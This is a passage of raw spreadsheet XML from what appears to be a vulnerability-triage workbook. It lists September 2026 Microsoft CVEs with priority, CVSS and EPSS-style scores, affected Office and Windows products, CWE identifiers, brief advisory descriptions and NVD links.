network.</t></is></c><c r="T161" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69601</t></is></c></row><row r="162"><c r="A162" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B162" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C162" s="5" t="inlineStr"><is><t>CVE-2026-69603</t></is></c><c r="D162" s="5" t="n"><v>8.800000000000001</v></c><c r="E162" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F162" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G162" s="5" t="inlineStr" /><c r="H162" s="5" t="n"><v>0.003</v></c><c r="I162" s="5" t="inlineStr" /><c r="J162" s="5" t="inlineStr" /><c r="K162" s="5" t="inlineStr" /><c r="L162" s="5" t="inlineStr" /><c r="M162" s="5" t="inlineStr" /><c r="N162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O162" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P162" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q162" s="5" t="inlineStr" /><c r="R162" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S162" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Hyper-V allows an authorized attacker to execute code locally.</t></is></c><c r="T162" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69603</t></is></c></row><row r="163"><c r="A163" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B163" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C163" s="5" t="inlineStr"><is><t>CVE-2026-69614</t></is></c><c r="D163" s="5" t="n"><v>8.800000000000001</v></c><c r="E163" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F163" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G163" s="5" t="inlineStr" /><c r="H163" s="5" t="n"><v>0.008999999999999999</v></c><c r="I163" s="5" t="inlineStr" /><c r="J163" s="5" t="inlineStr" /><c r="K163" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L163" s="5" t="inlineStr" /><c r="M163" s="5" t="inlineStr" /><c r="N163" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O163" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P163" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q163" s="5" t="inlineStr" /><c r="R163" s="5" t="inlineStr"><is><t>CWE-121, CWE-20</t></is></c><c r="S163" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T163" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69614</t></is></c></row><row r="164"><c r="A164" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B164" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C164" s="5" t="inlineStr"><is><t>CVE-2026-69628</t></is></c><c r="D164" s="5" t="n"><v>8.800000000000001</v></c><c r="E164" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F164" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G164" s="5" t="inlineStr" /><c r="H164" s="5" t="n"><v>0.008999999999999999</v></c><c r="I164" s="5" t="inlineStr" /><c r="J164" s="5" t="inlineStr" /><c r="K164" s="5" t="inlineStr" /><c r="L164" s="5" t="inlineStr" /><c r="M164" s="5" t="inlineStr" /><c r="N164" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O164" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P164" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q164" s="5" t="inlineStr" /><c r="R164" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S164" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows iSCSI allows an authorized attacker to execute code over a network.</t></is></c><c r="T164" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69628</t></is></c></row><row r="165"><c r="A165" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B165" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C165" s="5" t="inlineStr"><is><t>CVE-2026-69629</t></is></c><c r="D165" s="5" t="n"><v>8.800000000000001</v></c><c r="E165" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F165" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G165" s="5" t="inlineStr" /><c r="H165" s="5" t="n"><v>0.008</v></c><c r="I165" s="5" t="inlineStr" /><c r="J165" s="5" t="inlineStr" /><c r="K165" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t></is></c><c r="L165" s="5" t="inlineStr" /><c r="M165" s="5" t="inlineStr" /><c r="N165" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O165" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P165" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q165" s="5" t="inlineStr" /><c r="R165" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S165" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T165" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69629</t></is></c></row><row r="166"><c r="A166" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B166" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C166" s="5" t="inlineStr"><is><t>CVE-2026-69632</t></is></c><c r="D166" s="5" t="n"><v>8.800000000000001</v></c><c r="E166" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F166" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G166" s="5" t="inlineStr" /><c r="H166" s="5" t="n"><v>0.008</v></c><c r="I166" s="5" t="inlineStr" /><c r="J166" s="5" t="inlineStr" /><c r="K166" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L166" s="5" t="inlineStr" /><c r="M166" s="5" t="inlineStr" /><c r="N166" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O166" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P166" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q166" s="5" t="inlineStr" /><c r="R166" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S166" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T166" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69632</t></is></c></row><row r="167"><c r="A167" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B167" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C167" s="5" t="inlineStr"><is><t>CVE-2026-69649</t></is></c><c r="D167" s="5" t="n"><v>8.800000000000001</v></c><c r="E167" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F167" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G167" s="5" t="inlineStr" /><c r="H167" s="5" t="n"><v>0.008</v></c><c r="I167" s="5" t="inlineStr" /><c r="J167" s="5" t="inlineStr" /><c r="K167" s="5" t="inlineStr" /><c r="L167" s="5" t="inlineStr" /><c r="M167" s="5" t="inlineStr" /><c r="N167" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O167" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P167" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q167" s="5" t="inlineStr" /><c r="R167" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S167" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Raw Image Extension allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T167" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69649</t></is></c></row><row r="168"><c r="A168" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B168" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C168" s="5" t="inlineStr"><is><t>CVE-2026-69669</t></is></c><c r="D168" s="5" t="n"><v>8.800000000000001</v></c><c r="E168" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F168" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G168" s="5" t="inlineStr" /><c r="H168" s="5" t="n"><v>0.008</v></c><c r="I168" s="5" t="inlineStr" /><c r="J168" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K16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68" s="5" t="inlineStr" /><c r="M168" s="5" t="inlineStr" /><c r="N168" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O168" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P168" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q168" s="5" t="inlineStr" /><c r="R168" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S168" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Kernel allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T168" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69669</t></is></c></row><row r="169"><c r="A169" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B169" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C169" s="5" t="inlineStr"><is><t>CVE-2026-69671</t></is></c><c r="D169" s="5" t="n"><v>8.800000000000001</v></c><c r="E169" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F169" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G169" s="5" t="inlineStr" /><c r="H169" s="5" t="n"><v>0.008</v></c><c r="I169" s="5" t="inlineStr" /><c r="J169" s="5" t="inlineStr" /><c r="K169" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L169" s="5" t="inlineStr" /><c r="M169" s="5" t="inlineStr" /><c r="N169" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O169" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P169" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q169" s="5" t="inlineStr" /><c r="R169" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S169" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T169" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69671</t></is></c></row><row r="170"><c r="A170" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B170" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C170" s="5" t="inlineStr"><is><t>CVE-2026-69676</t></is></c><c r="D170" s="5" t="n"><v>8.800000000000001</v></c><c r="E170" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F170" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G170" s="5" t="inlineStr" /><c r="H170" s="5" t="n"><v>0.012</v></c><c r="I170" s="5" t="inlineStr" /><c r="J170" s="5" t="inlineStr" /><c r="K170" s="5" t="inlineStr" /><c r="L170" s="5" t="inlineStr" /><c r="M170" s="5" t="inlineStr" /><c r="N170" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O170" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P170" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q170" s="5" t="inlineStr" /><c r="R170" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S170" s="5" t="inlineStr"><is><t>Authentication bypass by capture-replay in Windows Kerberos allows an authorized attacker to execute code over a network.</t></is></c><c r="T170" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69676</t></is></c></row><row r="171"><c r="A171" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B171" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C171" s="5" t="inlineStr"><is><t>CVE-2026-69678</t></is></c><c r="D171" s="5" t="n"><v>8.800000000000001</v></c><c r="E171" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F171" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G171" s="5" t="inlineStr" /><c r="H171" s="5" t="n"><v>0.008</v></c><c r="I171" s="5" t="inlineStr" /><c r="J171" s="5" t="inlineStr" /><c r="K171" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L171" s="5" t="inlineStr" /><c r="M171" s="5" t="inlineStr" /><c r="N171" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O171" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P171" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q171" s="5" t="inlineStr" /><c r="R171" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S171" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T171" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69678</t></is></c></row><row r="172"><c r="A172" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B172" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C172" s="5" t="inlineStr"><is><t>CVE-2026-69686</t></is></c><c r="D172" s="5" t="n"><v>8.800000000000001</v></c><c r="E172" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F172" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G172" s="5" t="inlineStr" /><c r="H172" s="5" t="n"><v>0.008</v></c><c r="I172" s="5" t="inlineStr" /><c r="J172" s="5" t="inlineStr" /><c r="K172" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L172" s="5" t="inlineStr" /><c r="M172" s="5" t="inlineStr" /><c r="N172" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O172" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P172" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q172" s="5" t="inlineStr" /><c r="R172" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S172" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T172" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69686</t></is></c></row><row r="173"><c r="A173" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B173" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C173" s="5" t="inlineStr"><is><t>CVE-2026-69712</t></is></c><c r="D173" s="5" t="n"><v>8.800000000000001</v></c><c r="E173" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F173" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G173" s="5" t="inlineStr" /><c r="H173" s="5" t="n"><v>0.008999999999999999</v></c><c r="I173" s="5" t="inlineStr" /><c r="J173" s="5" t="inlineStr" /><c r="K173" s="5" t="inlineStr" /><c r="L173" s="5" t="inlineStr" /><c r="M173" s="5" t="inlineStr" /><c r="N173" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O173" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P173" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q173" s="5" t="inlineStr" /><c r="R173" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S173" s="5" t="inlineStr"><is><t>Use after free in Windows Key Distribution Center allows an authorized attacker to execute code over a network.</t></is></c><c r="T173" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69712</t></is></c></row><row r="174"><c r="A174" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B174" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C174" s="5" t="inlineStr"><is><t>CVE-2026-69716</t></is></c><c r="D174" s="5" t="n"><v>8.800000000000001</v></c><c r="E174" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F174" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G174" s="5" t="inlineStr" /><c r="H174" s="5" t="n"><v>0.008999999999999999</v></c><c r="I174" s="5" t="inlineStr" /><c r="J174" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K174" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L174" s="5" t="inlineStr" /><c r="M174" s="5" t="inlineStr" /><c r="N174" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O174" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P174" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q174" s="5" t="inlineStr" /><c r="R174" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S174" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T174" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69716</t></is></c></row><row r="175"><c r="A175" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B175" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C175" s="5" t="inlineStr"><is><t>CVE-2026-69722</t></is></c><c r="D175" s="5" t="n"><v>8.800000000000001</v></c><c r="E175" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F175" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G175" s="5" t="inlineStr" /><c r="H175" s="5" t="n"><v>0.008</v></c><c r="I175" s="5" t="inlineStr" /><c r="J175" s="5" t="inlineStr" /><c r="K175" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L175" s="5" t="inlineStr" /><c r="M175" s="5" t="inlineStr" /><c r="N175" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O175" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P175" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q175" s="5" t="inlineStr" /><c r="R175" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S175" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T175" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69722</t></is></c></row><row r="176"><c r="A176" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B176" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C176" s="5" t="inlineStr"><is><t>CVE-2026-69724</t></is></c><c r="D176" s="5" t="n"><v>8.800000000000001</v></c><c r="E176" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F176" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G176" s="5" t="inlineStr" /><c r="H176" s="5" t="n"><v>0.008</v></c><c r="I176" s="5" t="inlineStr" /><c r="J176" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K176" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L176" s="5" t="inlineStr" /><c r="M176" s="5" t="inlineStr" /><c r="N176" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O176" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P176" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q176" s="5" t="inlineStr" /><c r="R176" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S176" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T176" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69724</t></is></c></row><row r="177"><c r="A177" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B177" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C177" s="5" t="inlineStr"><is><t>CVE-2026-69729</t></is></c><c r="D177" s="5" t="n"><v>8.800000000000001</v></c><c r="E177" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F177" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G177" s="5" t="inlineStr" /><c r="H177" s="5" t="n"><v>0.008999999999999999</v></c><c r="I177" s="5" t="inlineStr" /><c r="J177" s="5" t="inlineStr" /><c r="K177" s="5" t="inlineStr" /><c r="L177" s="5" t="inlineStr" /><c r="M177" s="5" t="inlineStr" /><c r="N177" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O177" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P177" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q177" s="5" t="inlineStr" /><c r="R177" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S177" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to execute code over a network.</t></is></c><c r="T177" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69729</t></is></c></row><row r="178"><c r="A178" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B178" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C178" s="5" t="inlineStr"><is><t>CVE-2026-69740</t></is></c><c r="D178" s="5" t="n"><v>8.800000000000001</v></c><c r="E178" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F178" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G178" s="5" t="inlineStr" /><c r="H178" s="5" t="n"><v>0.003</v></c><c r="I178" s="5" t="inlineStr" /><c r="J178" s="5" t="inlineStr" /><c r="K178" s="5" t="inlineStr" /><c r="L178" s="5" t="inlineStr" /><c r="M178" s="5" t="inlineStr" /><c r="N178" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O178" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P178" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q178" s="5" t="inlineStr" /><c r="R178" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S178" s="5" t="inlineStr"><is><t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T178" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69740</t></is></c></row><row r="179"><c r="A179" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B179" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C179" s="5" t="inlineStr"><is><t>CVE-2026-69742</t></is></c><c r="D179" s="5" t="n"><v>8.800000000000001</v></c><c r="E179" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F179" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G179" s="5" t="inlineStr" /><c r="H179" s="5" t="n"><v>0.008</v></c><c r="I179" s="5" t="inlineStr" /><c r="J179" s="5" t="inlineStr" /><c r="K179" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t></is></c><c r="L179" s="5" t="inlineStr" /><c r="M179" s="5" t="inlineStr" /><c r="N179" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O179" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P179" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q179" s="5" t="inlineStr" /><c r="R179" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S179" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T179" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69742</t></is></c></row><row r="180"><c r="A180" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B180" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C180" s="5" t="inlineStr"><is><t>CVE-2026-69759</t></is></c><c r="D180" s="5" t="n"><v>8.800000000000001</v></c><c r="E180" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F180" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G180" s="5" t="inlineStr" /><c r="H180" s="5" t="n"><v>0.008</v></c><c r="I180" s="5" t="inlineStr" /><c r="J180" s="5" t="inlineStr" /><c r="K180" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L180" s="5" t="inlineStr" /><c r="M180" s="5" t="inlineStr" /><c r="N180" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O180" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P180" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q180" s="5" t="inlineStr" /><c r="R180" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S180" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T180" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69759</t></is></c></row><row r="181"><c r="A181" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B181" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C181" s="5" t="inlineStr"><is><t>CVE-2026-69764</t></is></c><c r="D181" s="5" t="n"><v>8.800000000000001</v></c><c r="E181" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F181" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G181" s="5" t="inlineStr" /><c r="H181" s="5" t="n"><v>0.008</v></c><c r="I181" s="5" t="inlineStr" /><c r="J181" s="5" t="inlineStr" /><c r="K181" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L181" s="5" t="inlineStr" /><c r="M181" s="5" t="inlineStr" /><c r="N181" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O181" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P181" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q181" s="5" t="inlineStr" /><c r="R181" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S181" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T181" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69764</t></is></c></row><row r="182"><c r="A182" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B182" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C182" s="5" t="inlineStr"><is><t>CVE-2026-69767</t></is></c><c r="D182" s="5" t="n"><v>8.800000000000001</v></c><c r="E182" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F182" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G182" s="5" t="inlineStr" /><c r="H182" s="5" t="n"><v>0.008</v></c><c r="I182" s="5" t="inlineStr" /><c r="J182" s="5" t="inlineStr" /><c r="K182" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L182" s="5" t="inlineStr" /><c r="M182" s="5" t="inlineStr" /><c r="N182" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O182" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P182" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q182" s="5" t="inlineStr" /><c r="R182" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S182" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T182" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69767</t></is></c></row><row r="183"><c r="A183" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B183" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C183" s="5" t="inlineStr"><is><t>CVE-2026-69772</t></is></c><c r="D183" s="5" t="n"><v>8.800000000000001</v></c><c r="E183" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F183" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G183" s="5" t="inlineStr" /><c r="H183" s="5" t="n"><v>0.008</v></c><c r="I183" s="5" t="inlineStr" /><c r="J183" s="5" t="inlineStr" /><c r="K183" s="5" t="inlineStr" /><c r="L183" s="5" t="inlineStr" /><c r="M183" s="5" t="inlineStr" /><c r="N183" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O183" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P183" s="5" 